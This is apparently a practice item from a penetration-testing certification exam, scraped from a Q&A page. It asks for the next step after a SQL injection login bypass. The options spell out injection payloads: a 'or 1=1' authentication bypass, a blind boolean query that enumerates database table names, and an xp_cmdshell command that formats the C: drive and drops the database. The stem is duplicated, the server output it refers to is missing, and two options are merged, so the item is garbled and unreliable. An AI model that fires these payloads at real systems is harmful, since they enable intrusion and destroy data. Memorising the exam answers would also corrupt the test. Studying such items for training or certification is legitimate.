What is the next step you should do?

You are conducting pen-test against a company’s website using SQL Injection techniques. You
enter “anuthing or 1=1-“ in the username filed of an authentication form. This is the output returned
from the server.
What is the next step you should do?

You are conducting pen-test against a company’s website using SQL Injection techniques. You
enter “anuthing or 1=1-“ in the username filed of an authentication form. This is the output returned
from the server.
What is the next step you should do?

A.
Identify the user context of the web application by running_
http://www.example.com/order/include_rsa_asp?pressReleaseID=5
AND
USER_NAME() = ‘dbo’

B.
Identify the database and table name by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5
AND
ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE
xtype=’U’),1))) > 109

C.
Format the C: drive and delete the database by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND
xp_cmdshell ‘format c: /q /yes ‘; drop database myDB; –D. Reboot the web server by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5

Show Hint

Leave a Reply 1

Your email address will not be published. Required fields are marked *